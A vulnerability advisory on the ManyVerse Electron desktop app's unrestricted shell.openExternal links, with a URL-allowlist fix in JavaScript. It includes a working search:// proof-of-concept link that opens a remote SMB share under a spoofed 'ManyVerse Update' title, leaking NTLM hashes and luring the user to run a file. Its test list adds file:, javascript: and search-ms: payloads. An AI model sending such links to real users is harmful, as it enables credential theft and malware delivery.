Summary
The ManyVerse desktop application does not protect against malicious links that are handed to Electron's shell.openExternal. This can result in malicious file delivery, NTLM hash exposure and other local actions on the victim's machine.
Details
The ManyVerse application is built on the Electron framework, which gives users and developers a lot of useful functionality, but user input has to be controlled or it can lead to user compromise. The application currently lets users add links to public/private chats, but it does not restrict the protocol handlers those links may use. That by itself is not unusual; however, Electron does not provide the same protection mechanisms that modern browsers do (even though it is based on Chromium). When developers let users post links, then per the Electron security guideline (https://www.electronjs.org/docs/latest/tutorial/security#15-do-not-use-shellopenexternal-with-untrusted-content) the content has to be restricted, or developers need to implement an allowlist of protocol handlers that the application is willing to open.
If this is not implemented, attackers can send links with malicious protocol handlers that launch other applications on the machine. Electron does not show a security warning the way modern browsers do, so the action is launched without further user consent once the link is clicked.
There are many dangerous protocol handlers that can trigger malicious actions on the machine, but one of the most recent ones is the native Microsoft search:// (or search-ms://) protocol handler. It can be used to make the victim's machine connect to a remote, attacker-controlled SMB share and present files that would usually be blocked by anti-virus. When the client connects and authenticates to that share, its NTLM credentials (the Net-NTLMv2 challenge/response) are exposed to the attacker's SMB server. Even worse, the Explorer window title can be spoofed via the displayName parameter to trick the user into running the malicious file that is presented. Once the user runs it and is infected, the attacker can chain further local actions, including through other protocol handlers.
PoC
- Log into the ManyVerse application
- Send a user a message or send a new message to a public channel
- Include the following PoC link: search://query=PsExec.exe&crumb=location:%5c%5clive.sysinternals.com%5ctools&displayName=Important%20ManyVerse%20Update
- Send it to the user and have them click on it
- Wait approx. 20-30 seconds after the click. A spoofed Windows File Explorer window opens and presents the malicious file. In the PoC the user connected to Microsoft's public SMB share (live.sysinternals.com), but I've confirmed that the same is possible with impacket's SMB server.
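The allowlist check that the Electron guideline referenced in the Details section asks for, as an added example (this is not Manyverse's code): a pure function that rejects every scheme except http:, https: and mailto: before anything reaches shell.openExternal, with the opener passed in as a parameter so the decision logic can be exercised without Electron. The allowlist, the length cap and the sample link list are assumptions; the search:// link is the PoC link from this report.

```javascript
// Added example, not Manyverse code. Validate a user-supplied link before it
// is handed to Electron's shell.openExternal (Electron security guideline 15).
// Assumed allowlist: only schemes a chat client has a reason to open.
const ALLOWED_PROTOCOLS = new Set(["http:", "https:", "mailto:"]);
const MAX_URL_LENGTH = 2048; // assumed cap; keeps pathological input out of the parser

// Returns { allowed: true, url } or { allowed: false, reason }.
// The scheme is extracted with a regex first so that links the WHATWG parser
// cannot even parse (the PoC link throws in `new URL` because of its ':' in
// the authority) are still reported as "scheme not in allowlist".
function classifyExternalUrl(raw) {
  if (typeof raw !== "string" || raw.length === 0 || raw.length > MAX_URL_LENGTH) {
    return { allowed: false, reason: "empty, not a string, or too long" };
  }
  const trimmed = raw.trim();
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(trimmed);
  if (!m) {
    return { allowed: false, reason: "no scheme (relative reference)" };
  }
  const scheme = m[1].toLowerCase() + ":"; // "SEARCH-MS:" and "search-ms:" are the same handler
  if (!ALLOWED_PROTOCOLS.has(scheme)) {
    return { allowed: false, reason: `scheme ${scheme} not in allowlist` };
  }
  let url;
  try {
    url = new URL(trimmed); // canonicalises the URL; throws on e.g. "https://"
  } catch {
    return { allowed: false, reason: "unparseable URL" };
  }
  if (url.protocol !== scheme) {
    return { allowed: false, reason: "scheme changed during parsing" };
  }
  if (scheme !== "mailto:" && url.hostname === "") {
    return { allowed: false, reason: "missing host" };
  }
  return { allowed: true, url: url.href };
}

// The opener is injected so this can run without Electron. In the main process
// you would call: openExternalChecked(href, (u) => shell.openExternal(u))
// from wherever link clicks arrive (an IPC handler, will-navigate, or
// webContents.setWindowOpenHandler), and never call shell.openExternal directly.
function openExternalChecked(raw, opener) {
  const verdict = classifyExternalUrl(raw);
  if (!verdict.allowed) {
    return { opened: false, reason: verdict.reason };
  }
  opener(verdict.url);
  return { opened: true, url: verdict.url };
}

// PoC link from this report.
const POC_LINK =
  "search://query=PsExec.exe&crumb=location:%5c%5clive.sysinternals.com%5ctools&displayName=Important%20ManyVerse%20Update";

// Constructed sample links (assumed, for demonstration only).
const SAMPLE_LINKS = [
  "https://www.manyverse.org/",
  "mailto:someone@example.com",
  POC_LINK,
  "search-ms:query=PsExec.exe&crumb=location:%5c%5c127.0.0.1%5cshare",
  "SEARCH-MS:query=x",
  "file:///C:/Windows/System32/cmd.exe",
  "javascript:alert(1)",
  "not a url",
];

// Runs every sample through the guard with a recording opener; returns what
// would actually have reached shell.openExternal.
function demo() {
  const opened = [];
  const results = SAMPLE_LINKS.map((link) => [link, openExternalChecked(link, (u) => opened.push(u))]);
  return { results, opened };
}

for (const [link, r] of demo().results) {
  console.log(r.opened ? "OPEN " : "BLOCK", link, r.reason ?? "");
}
```

Only the two allowlisted links reach the opener; the PoC link, the search-ms: variants, file:, javascript: and the non-URL are all blocked before shell.openExternal is called. An allowlist is the right shape here: a denylist of "known bad" handlers such as search-ms: would have to be updated every time a new abusable handler appears.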
Impact
Malicious file delivery, hash exposure and other local actions, depending on which protocol handler is used. There is a long-standing history of CVEs in which protocol handler abuse of this kind was possible.